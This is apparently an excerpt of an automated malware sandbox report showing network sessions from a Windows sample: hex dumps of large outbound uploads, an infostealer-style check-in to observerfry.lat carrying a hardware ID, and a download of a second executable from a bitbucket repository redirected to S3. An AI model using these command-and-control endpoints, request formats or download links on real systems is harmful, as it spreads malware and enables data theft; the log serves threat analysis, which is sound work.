                                                                                                                                            2024-12-23 16:20:36 UTC15331OUTData Raw: a0 f0 e1 f7 c9 2a 53 28 a1 22 da d3 0e d4 84 78 a7 3a 26 4f 80 52 81 1c c4 83 2b c9 35 65 8a 80 50 e5 37 32 c7 f8 d6 fa 4c 83 77 37 e7 1f 69 b3 93 5e 50 46 c5 de d0 a3 bf 18 9d f7 3f 41 f4 dc 42 25 cf 4e e5 34 41 34 ec 74 eb bc c9 dc f6 fa dc f0 da af 64 5f 1c d0 2c 26 00 76 b7 94 c7 9e 38 14 a2 30 b4 4f 7a 4d c0 7e 37 14 5c 08 7d 26 9a 41 7f 63 72 ea 47 ec 47 c1 7b d6 c1 9f ba 10 f0 3e 6e 28 03 0a 81 d8 bb 99 0c df 1f 3c a0 d9 f7 7f fb 93 fe 0f 03 f3 03 be 8d fd f0 02 80 55 71 6d eb 7c 60 a8 18 a2 70 a9 24 14 75 92 f5 86 e4 36 e7 2e 0f 47 80 90 37 f7 eb 13 f5 a8 8c c5 9a 7f 4d 6c 21 ea 01 31 ce cf 58 3c 4f b7 ce c5 82 a8 90 d5 c8 94 47 b2 97 63 7d c6 c4 dd 55 b0 88 4b 3b b4 16 f8 c7 82 a8 27 a6 57 9e 05 9f 36 76 a0 9a 2f 63 25 83 8f 9c 49 6e 4b 2f d9 cc
                                                                                                                                            Data Ascii: *S("x:&OR+5eP72Lw7i^PF?AB%N4A4td_,&v80OzM~7\}&AcrGG{>n(<Uqm|`p$u6.G7Ml!1X<OGc}UK;'W6v/c%InK/
                                                                                                                                            2024-12-23 16:20:36 UTC15331OUTData Raw: 7d 2a bd 9c 45 09 e9 e4 d0 80 47 4b 40 70 05 3f 30 32 cd d0 46 3b 3c b1 4d 45 1a 95 a7 3f 83 dd 65 7e 6f 66 50 49 e6 3d ba 94 b0 0a 3c c9 5d 48 1d 0d b6 85 68 86 01 9c ff 61 7f 28 62 6d 56 0b 38 08 d0 19 e2 df fc e0 e2 03 84 68 86 2e 27 06 90 87 e7 39 f4 62 38 44 cb 90 82 5f 35 db c8 7c 23 75 fe b2 ae e2 2a bd ce 02 24 96 20 17 6a 97 b4 a4 a7 a1 25 8f 0e 99 0c 4e 86 a2 ca 14 70 ed 4d 6f 9a 38 12 39 2c a1 f8 87 a9 14 5c 26 9b f4 fb a9 2d 76 d6 43 21 16 43 7a 47 7f e3 33 3c 50 9f 94 40 7a a9 1a a6 c7 ed 58 54 64 93 bb b5 31 0b ed e4 b9 49 07 d6 fd bc b6 70 0f 1b 83 48 07 90 b8 38 56 fd f8 cf f3 1f 4e 24 0a f5 08 7f dd 54 78 0c 72 9b f8 89 8b 85 fc 29 34 e4 fa c5 6e ec 98 ec f8 a7 88 50 6d 64 97 48 e0 51 c2 41 b8 e4 6b 8d 7f 21 0e 81 f8 36 13 64 b9 22 10 fe
                                                                                                                                            Data Ascii: }*EGK@p?02F;<ME?e~ofPI=<]Hha(bmV8h.'9b8D_5|#u*$ j%NpMo89,\&-vC!CzG3<P@zXTd1IpH8VN$Txr)4nPmdHQAk!6d"
                                                                                                                                            2024-12-23 16:20:36 UTC15331OUTData Raw: 4c d0 e1 6b c7 8c 8a d7 24 b4 c1 fb 49 f6 f7 af 47 98 31 18 cd 07 b8 b1 aa 6e a8 e9 20 36 01 fa b5 7d 11 23 8c 0c ff 5a 7d e1 dc 02 81 b7 c7 7f 4b a8 e9 42 8c c2 c2 01 fc ee 5e 25 fe b3 f4 ac 56 93 04 c8 fd 78 af 45 44 80 05 89 1f 28 7b 98 ab f6 94 ae 37 d0 e5 1c c3 8f da 16 62 f6 f7 63 b4 c6 1a 2a de a2 f7 f2 82 ae 92 2c 5b ef 43 d7 a4 46 a5 0e 08 c2 c5 20 b5 f4 6a ca 77 ba 41 60 3b 82 58 c1 33 bf a2 bf 5f 32 fc 8e 56 96 b3 10 88 ff ce 1e d3 c7 67 a8 89 4a fd e6 c4 c3 ee df 45 b1 2d 60 9d 64 c7 3b 8f 59 9e fa f3 13 81 e3 63 8a 2e bc bb d4 6e 56 3f 01 e1 d9 68 13 e2 87 2e c8 48 eb 98 e4 80 31 2f 80 2a 92 a2 a2 83 13 00 ee 8d 0c f5 4e cc ce 80 da 25 f6 eb 60 94 2d 29 f9 d0 31 8f 75 4b 88 b4 50 f4 07 68 ea ad ab c6 37 df d7 dd d5 ae 14 49 86 93 cb 17 61 41
                                                                                                                                            Data Ascii: Lk$IG1n 6}#Z}KB^%VxED({7bc*,[CF jwA`;X3_2VgJE-`d;Yc.nV?h.H1/*N%`-)1uKPh7IaA
                                                                                                                                            2024-12-23 16:20:36 UTC15331OUTData Raw: b4 68 fd ef f5 20 22 09 41 14 73 c1 cb 86 7f ff 50 db b1 57 96 4a f1 c0 76 6f fe 3f 6b f2 ff 5f 2f 85 70 e7 28 cf 38 02 e8 ae c6 88 5c 41 62 c2 df 09 b9 ef db 73 11 b8 24 5b b2 19 a3 53 29 ae 76 26 7d e2 e0 2c 49 12 41 05 a1 51 a1 2f 0e 23 88 9e 90 ba 32 4e 91 ff ca 6a f2 86 9e f6 ad 2f 63 5f e3 6b 9a 8b 4e df ce 12 1a c6 81 b3 54 3b 2e 60 be 82 3c ec e4 21 43 55 91 50 0d dc 83 f7 47 0a 4f 5d f7 d3 00 8e 98 3f d7 c7 7b 2a 50 9b 72 a9 68 d0 a9 1f 6e 34 d6 4f 19 fe a4 7a 0f a9 54 fb fc 9b 0e a4 2d ef 80 02 3c 2c ff 05 85 66 13 06 db f5 79 3e 1a fe 86 3f d5 ed 7f 1f c1 c1 40 f4 bf 8a 6d cc d6 7e 62 f5 37 a9 b8 d4 e2 3d f6 8a 99 a5 9b 17 25 31 49 64 28 a3 02 15 b0 9e 91 77 f5 1a ef db 07 c6 9e ab 7b da cd eb ed e0 2c d3 3b f6 2c dd 0e 34 09 0b 3d 09 db df 1e
                                                                                                                                            Data Ascii: h "AsPWJvo?k_/p(8\Abs$[S)v&},IAQ/#2Nj/c_kNT;.`<!CUPGO]?{*Prhn4OzT-<,fy>?@m~b7=%1Id(w{,;,4=
                                                                                                                                            2024-12-23 16:20:36 UTC15331OUTData Raw: 78 54 77 ec e8 e3 fb b9 ae f4 7e 24 8e d2 50 17 ea f9 2d 26 1a 0e 9d 4d bb c6 a3 ab a1 ac c9 bd d1 cc 43 d5 52 d2 f8 4d 01 94 46 d6 17 05 1f 2e 84 12 80 48 7e d6 a2 9e cf 64 a6 12 c6 e3 fb 8f 65 28 ed 0f be 76 17 1a 1c a8 28 db ca 4c 09 ab 33 b7 f6 a3 57 56 51 ac 99 01 11 cf fe 22 d5 ca d9 bb ab de 76 9a 18 58 05 bc 8a 14 ec 3c e9 00 6f 03 4f 05 27 4b a3 03 67 26 3b 73 6c 65 d8 23 be 73 73 6f 73 ca 27 3e a6 6a 63 0d c0 99 74 e2 c5 59 45 27 e1 03 ba dc 9f 79 a3 15 42 f1 b5 ef 7e 86 a8 86 8e 99 b3 3a 97 cc 59 63 32 dc 2a b3 fc 91 b0 d9 cb 72 c7 0f fa 86 f1 09 54 57 44 ef b9 2a 2d 00 55 98 b6 36 9c cc 54 04 c9 6e a0 38 7f ef 89 83 e0 7d 7f b1 0b 1e d4 43 a8 db 0c 27 f6 8b 17 7c 32 11 7c bd 91 eb 29 f2 68 fa c9 f0 ad 8b 00 bc 14 a9 7f f9 d4 83 a2 a9 b4 77 a9
                                                                                                                                            Data Ascii: xTw~$P-&MCRMF.H~de(v(L3WVQ"vX<oO'Kg&;sle#ssos'>jctYE'yB~:Yc2*rTWD*-U6Tn8}C'|2|)hw
                                                                                                                                            2024-12-23 16:20:36 UTC15331OUTData Raw: 8a c8 7e 58 8e 21 47 95 b7 83 c5 86 55 c6 f3 5f 93 fc 36 26 a4 69 0a 95 5f f2 09 43 92 63 3b 19 5f e4 67 6f de a6 e6 6e dd 43 46 95 ef 1b 69 1e b1 8d 0e 91 16 ec c8 af 4c d7 e6 81 95 b9 94 09 5c ed aa 13 61 6b 8e 72 15 47 0e a2 68 73 c1 2a f8 4f 3e e8 b2 ef 72 51 22 5b 79 23 52 b0 d1 fd 57 75 24 ae bf a4 8a 5b 56 f5 c2 87 b9 56 38 c8 b2 3e f5 57 5d be 01 50 b2 02 d6 ee 1b 23 02 a7 2c c1 6f 27 0e 0c 31 7d 67 ab e6 2e f5 85 b5 1e eb d4 03 37 e8 35 95 49 fc c0 9e 5b fb a0 35 5b 46 eb a8 5e e0 8c e1 2c 20 8d b1 85 10 1d 78 84 f5 24 48 1a 32 3c 27 0b b7 2c e0 c0 21 5d 77 88 f4 db 8e d8 f5 74 24 86 b9 10 3e fd 9b 70 6a f8 cc 4f 92 06 cf 5d 4d 81 a0 b3 de cd ef 0e 68 9a e5 27 ec b8 be 36 b1 34 2d 39 ff 53 47 fa f7 ec 0d 83 77 cd f1 e9 83 29 de 87 af 1c 3c 67 30
                                                                                                                                            Data Ascii: ~X!GU_6&i_Cc;_gonCFiL\akrGhs*O>rQ"[y#RWu$[VV8>W]P#,o'1}g.75I[5[F^, x$H2<',!]wt$>pjO]Mh'64-9SGw)<g0
                                                                                                                                            2024-12-23 16:20:36 UTC15331OUTData Raw: df 5f 28 9c 1f 94 07 8d ed 8b 2f c5 2b 65 ff 5a ec 8e e8 da 91 3c a6 23 5c 5b 38 fd 48 a7 28 78 21 d4 fc 27 56 72 ff d0 ef 61 67 9f b5 6f 3a f6 3a 2c 19 e5 1f 0a ea 73 67 e9 0d b8 8d 9b f3 7a ef 91 90 ba 03 21 b6 22 cf bb 86 4e 2f 1e 89 8b bc 31 b4 63 a4 45 c4 82 17 cf 08 e3 c1 dd 37 75 3e 80 12 49 b3 d4 82 22 32 94 eb 65 b6 15 bc 59 18 4f 0d d5 09 d9 90 d0 0b fc d8 07 c1 7c 8e 59 fb f0 84 37 3d 72 4f 79 70 30 1a df a3 9e 7e 7b fd 9b 92 fe 1d 40 2c 76 cf 73 05 4e 8f 94 f4 8f d0 2b 4e 02 0a 0c af fd 65 46 75 46 23 47 ef 0a 02 f1 85 e7 0c 57 33 50 24 8f 3e 64 5e eb c3 0f ba da af bd f0 7a 4e 62 74 f1 21 62 ee 74 09 f4 91 1d 20 ff 26 fc ee b8 c0 d4 2a 0c a4 51 05 30 32 ab 4c 57 03 79 0b 7e b6 67 a2 4f 0a a0 5f 8f d4 4e 2d 94 68 d5 06 5f c6 02 1e db 12 e1 7c
                                                                                                                                            Data Ascii: _(/+eZ<#\[8H(x!'Vrago::,sgz!"N/1cE7u>I"2eYO|Y7=rOyp0~{@,vsN+NeFuF#GW3P$>d^zNbt!bt &*Q02LWy~gO_N-h_|
                                                                                                                                            2024-12-23 16:20:36 UTC15331OUTData Raw: 5c 95 79 fc 1b fa 14 ba 91 6d 46 af d3 29 2c a4 ce 5f ca 8e f7 59 2f 3b 40 52 63 2a 66 44 43 38 be 89 54 3c 89 da 64 fe 5a 05 6d 25 96 46 21 10 93 11 fb 01 1a 0f b2 44 09 08 fc 50 4b 58 06 38 82 a7 0f 3c a6 3b 80 4c 89 fe 0a fd b0 5f 93 1e 8b 9c 42 22 7b 1a 2c 88 33 19 93 b4 9d 86 1b b8 d9 c0 26 57 ea fa bf 26 61 5f 4c a6 70 9d 11 4e bb f6 35 1a 3c 4f 29 7a de d9 60 eb 81 7a 00 b2 e2 2f ef 65 be 7f ff 7c d8 71 58 21 2a 0b 26 df ec a0 7a 67 1a d9 2d 9e 33 22 a4 4c c7 46 a2 63 fc bf d0 08 12 11 3d 69 85 e7 bc 58 da b1 5e f7 10 e2 9f d3 46 2c cc 6e 76 eb 9f cf 0c 12 9a ca 37 53 f8 b1 d8 3c 42 2c 80 96 f6 2c d9 01 5b 3d 12 de 02 a0 44 fe dd 01 4e 24 a4 de 1c 7b e5 9e 4c b1 77 ff 20 83 1f 0b 9b 5c 57 51 fd c5 7a 0d 46 d6 79 a8 ef 7c 9d c9 5c a6 ef de 8d e0 7d
                                                                                                                                            Data Ascii: \ymF),_Y/;@Rc*fDC8T<dZm%F!DPKX8<;L_B"{,3&W&a_LpN5<O)z`z/e|qX!*&zg-3"LFc=iX^F,nv7S<B,,[=DN${Lw \WQzFy|\}
                                                                                                                                            2024-12-23 16:20:36 UTC15331OUTData Raw: e1 9f cb 63 d9 4f 7d 3d 8c 26 07 5d f5 f5 d7 3e 39 63 be 60 4b 9d e1 70 b1 02 ae 25 53 ed 6e 34 26 58 3b 2a df b4 16 56 aa 07 aa 1a 39 06 c6 fc 96 a4 b5 69 e3 f2 ef b5 f6 63 3d 3f d0 65 1b a8 b5 0d 43 67 06 60 7c 42 80 f0 af d7 51 28 6e 2a 1f b2 af 43 33 cf 96 2a 7f 82 ad 7c bd 1a d0 4c e6 e3 79 d9 4f 70 26 0a 85 02 ac 9e 32 40 f7 8b 82 4f f3 94 dc a4 fe 1b 3b 7c 2b 86 d2 09 01 cb 83 a8 34 4f e0 fd ec df 62 b6 54 07 b3 b9 b2 32 20 e0 79 38 a0 07 8d 3a 5c e5 5c 04 b4 3e cc b5 6e 61 96 3f 0f e0 e1 ec 26 90 c3 d8 fa 10 2b 3a 38 c2 b7 f4 61 fc 91 71 4f de ff 1a e0 08 b3 f8 8f 28 a6 fb af fa e7 16 23 82 4b c8 99 a5 91 96 09 cc 8e 9d 27 a6 f8 4d 22 ea f0 db c2 75 7b cb 35 4a 5b 78 13 ee d6 f9 3a f1 be 49 14 5d 7d 49 77 be d1 48 0f c0 00 8f 91 a0 ec 17 6f ff cd
                                                                                                                                            Data Ascii: cO}=&]>9c`Kp%Sn4&X;*V9ic=?eCg`|BQ(n*C3*|LyOp&2@O;|+4ObT2 y8:\\>na?&+:8aqO(#K'M"u{5J[x:I]}IwHo
                                                                                                                                            2024-12-23 16:20:40 UTC1135INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 23 Dec 2024 16:20:40 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=490tedv0o5me3533d0c9113efk; expires=Fri, 18 Apr 2025 10:07:17 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ejjCCVIerwPru1vBWYJystgtH%2BkBZUUdvLf8O1g%2Bd9atXpaZsLeivSp4P7rrskEkWysGr%2FGB0kMN%2BEAT4n3oJI9kMcrEaTv0a9uGIPIW%2FEGubGSgB0z4frdfziQ257uFka4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f69ae0f7c6778d3-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1962&rtt_var=749&sent=305&recv=593&lost=0&retrans=0&sent_bytes=2836&recv_bytes=573933&delivery_rate=1448412&cwnd=210&unsent_bytes=0&cid=f07fc32f18764a39&ts=3980&x=0"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            7192.168.2.1049762104.21.36.2014437248C:\Users\user\Desktop\fr2Mul3G6m.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-23 16:20:41 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 88
                                                                                                                                            Host: observerfry.lat
                                                                                                                                            2024-12-23 16:20:41 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 41 41 44 30 32 36 39 41 44 41 37 43 44 36 32 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=AAD0269ADA7CD62DAC8923850305D13E
                                                                                                                                            2024-12-23 16:20:42 UTC1129INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 23 Dec 2024 16:20:42 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=7ud0atm94teq37ji8eolef2oo5; expires=Fri, 18 Apr 2025 10:07:21 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fgmRmEkgZMBnSyhZZAXf8ArTtmwAyI800%2FDROUsihcgYLMWaDtAVOpv46M2Vk6o%2FxXdL0e5biqca5v4imQBui6DiLbfz%2BZPpQsT1SYfrc0BgOL%2FbYSE%2BaUKXvhGTdtz%2Bies%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f69ae311f5978e8-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2014&min_rtt=1996&rtt_var=761&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=987&delivery_rate=1462925&cwnd=230&unsent_bytes=0&cid=d7439ecd6ad83d64&ts=770&x=0"
                                                                                                                                            2024-12-23 16:20:42 UTC240INData Raw: 31 31 30 0d 0a 2f 57 52 6f 42 35 68 50 4d 39 65 73 4e 64 52 33 34 47 6f 39 33 57 2f 63 6f 32 6e 35 69 71 65 73 6a 79 34 77 4b 56 78 6b 72 49 79 6d 48 30 70 79 75 6e 55 52 76 39 68 42 70 41 54 61 4e 68 4b 42 51 4c 37 4b 48 5a 76 2f 78 4d 66 71 57 68 35 47 4c 67 50 77 6f 35 41 64 42 6d 4c 76 4f 46 79 6c 78 30 61 6b 46 6f 4d 50 44 4f 39 63 37 35 4a 62 70 61 58 55 7a 2b 46 4b 62 41 59 34 43 39 76 69 6b 51 73 4a 59 2b 73 54 48 4a 48 44 52 37 6b 57 6c 42 35 55 73 77 69 66 79 77 69 4c 34 39 50 4e 37 55 4a 56 42 7a 6b 63 79 61 37 52 52 67 35 7a 75 6e 55 44 2b 34 35 51 39 6b 33 52 46 78 47 6d 54 61 6d 42 55 39 76 69 30 39 6a 2f 46 47 77 47 41 45 75 64 74 4d 68 4b 57 6a 61 74 59 51 4c 6d 6e 78 76 6c 51 62 78 46 55 72 73
                                                                                                                                            Data Ascii: 110/WRoB5hPM9esNdR34Go93W/co2n5iqesjy4wKVxkrIymH0pyunURv9hBpATaNhKBQL7KHZv/xMfqWh5GLgPwo5AdBmLvOFylx0akFoMPDO9c75JbpaXUz+FKbAY4C9vikQsJY+sTHJHDR7kWlB5UswifywiL49PN7UJVBzkcya7RRg5zunUD+45Q9k3RFxGmTamBU9vi09j/FGwGAEudtMhKWjatYQLmnxvlQbxFUrs
                                                                                                                                            2024-12-23 16:20:42 UTC39INData Raw: 4a 67 49 77 4e 6e 4f 79 4a 79 66 64 4c 45 67 56 2b 41 74 69 75 78 31 52 45 4a 66 31 74 43 65 62 52 61 41 3d 3d 0d 0a
                                                                                                                                            Data Ascii: JgIwNnOyJyfdLEgV+Atiux1REJf1tCebRaA==
                                                                                                                                            2024-12-23 16:20:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            8192.168.2.1049768185.166.143.494437248C:\Users\user\Desktop\fr2Mul3G6m.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-23 16:20:44 UTC248OUTGET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Host: bitbucket.org
                                                                                                                                            2024-12-23 16:20:44 UTC5946INHTTP/1.1 302 Found
                                                                                                                                            Date: Mon, 23 Dec 2024 16:20:44 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Content-Length: 0
                                                                                                                                            Server: AtlassianEdge
                                                                                                                                            Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBMCGIYG4&Signature=MwdFjSVvRTtUMhrKnS0ADjCdj%2BE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJIMEYCIQCwJILF2PjKxyx5vAxAV73HfzgzvSyFAXVrOBvKYyt8PQIhAOdztiCBWEvV2qouvG7bsz9QPfIIuEPwLPSFr9s9WNASKrACCNn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgzxrN0KOEH15yWTkuYqhALpZLUobHZAjSFUdGc6%2FstWYFcwFkCIN6wBAur9ym%2Bx27QtmKeJna5vkKnzJ9eYD78uI76p3HubjrIoVsX4TAiRhYq9JMgl0iLM6bKKE2mpndzW4WlwDvAc9cIRCYnooMCDEDk%2BWi7CIsIhzjAMjHsSNwHx2fs0f4QaWux1EuFDVbII553xmsE6nwCV04ret%2B24FulYLj8mN2oxbhTeFR0BI2MBJSWzfWLB9IdmgdizEb5d2%2Fj6HLhAGU29BdcDHvaV6F89h%2FwrVGvWIH93pBV6N1fQv5HZO6c2o0F9bD2eVJPcBBCixNQ85of04AorKC%2BjQnNGO9HTJPZxf%2F9%2BODtubfvDyzC0l6a7BjqcAQbAiUx9RQLShiyScGA1kbkexaR%2FA6TGZ%2F2aLEhmULy6VgALgWN32CiKxrc5N8c5olqLrt0DipR%2F%2F7Mms [TRUNCATED]
                                                                                                                                            Expires: Mon, 23 Dec 2024 16:20:44 GMT
                                                                                                                                            Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                            X-Used-Mesh: False
                                                                                                                                            Vary: Accept-Language, Origin
                                                                                                                                            Content-Language: en
                                                                                                                                            X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                            X-Dc-Location: Micros-3
                                                                                                                                            X-Served-By: 838b81a6811f
                                                                                                                                            X-Version: c9b3998323c0
                                                                                                                                            X-Static-Version: c9b3998323c0
                                                                                                                                            X-Request-Count: 2012
                                                                                                                                            X-Render-Time: 0.05035996437072754
                                                                                                                                            X-B3-Traceid: ea88742beaa0487585d1feda51f36392
                                                                                                                                            X-B3-Spanid: 692baa65436ea6c5
                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                            Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl- [TRUNCATED]
                                                                                                                                            X-Usage-Quota-Remaining: 999197.137
                                                                                                                                            X-Usage-Request-Cost: 817.77
                                                                                                                                            X-Usage-User-Time: 0.024533
                                                                                                                                            X-Usage-System-Time: 0.000000
                                                                                                                                            X-Usage-Input-Ops: 0
                                                                                                                                            X-Usage-Output-Ops: 0
                                                                                                                                            Age: 0
                                                                                                                                            X-Cache: MISS
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-Xss-Protection: 1; mode=block
                                                                                                                                            Atl-Traceid: ea88742beaa0487585d1feda51f36392
                                                                                                                                            Atl-Request-Id: ea88742b-eaa0-4875-85d1-feda51f36392
                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                            Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                            Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                            Server-Timing: atl-edge;dur=159,atl-edge-internal;dur=3,atl-edge-upstream;dur=158,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                            Connection: close


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            9192.168.2.10497743.5.25.1454437248C:\Users\user\Desktop\fr2Mul3G6m.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-23 16:20:46 UTC1354OUTGET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBMCGIYG4&Signature=MwdFjSVvRTtUMhrKnS0ADjCdj%2BE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJIMEYCIQCwJILF2PjKxyx5vAxAV73HfzgzvSyFAXVrOBvKYyt8PQIhAOdztiCBWEvV2qouvG7bsz9QPfIIuEPwLPSFr9s9WNASKrACCNn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgzxrN0KOEH15yWTkuYqhALpZLUobHZAjSFUdGc6%2FstWYFcwFkCIN6wBAur9ym%2Bx27QtmKeJna5vkKnzJ9eYD78uI76p3HubjrIoVsX4TAiRhYq9JMgl0iLM6bKKE2mpndzW4WlwDvAc9cIRCYnooMCDEDk%2BWi7CIsIhzjAMjHsSNwHx2fs0f4QaWux1EuFDVbII553xmsE6nwCV04ret%2B24FulYLj8mN2oxbhTeFR0BI2MBJSWzfWLB9IdmgdizEb5d2%2Fj6HLhAGU29BdcDHvaV6F89h%2FwrVGvWIH93pBV6N1fQv5HZO6c2o0F9bD2eVJPcBBCixNQ85of04AorKC%2BjQnNGO9HTJPZxf%2F9%2BODtubfvDyzC0l6a7BjqcAQbAiUx9RQLShiyScGA1kbkexaR%2FA6TGZ%2F2aLEhmULy6VgALgWN32CiKxrc5N8c5olqLrt0DipR%2F%2F7MmsHColzgGXJLmUHrm13atMcZf%2FuBb%2BPxmHLYKU6KY3 [TRUNCATED]
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                            2024-12-23 16:20:46 UTC586INHTTP/1.1 200 OK
                                                                                                                                            x-amz-id-2: MLE7IJ4rm46FcAbIQCOHjYqdbXpNMFRLSU1y9bZ6T47Q0fzVv0XLttpHUyu/YSV2CyNshK0F84XVJ4j+Bof1MUE2DDfPK3Rom/+Fqglz10U=
                                                                                                                                            x-amz-request-id: 9C1RBY4A1D9F73KT
                                                                                                                                            Date: Mon, 23 Dec 2024 16:20:47 GMT
                                                                                                                                            Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                            ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                            x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
                                                                                                                                            Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Type: application/x-msdownload
                                                                                                                                            Content-Length: 1325507
                                                                                                                                            Server: AmazonS3
                                                                                                                                            Connection: close
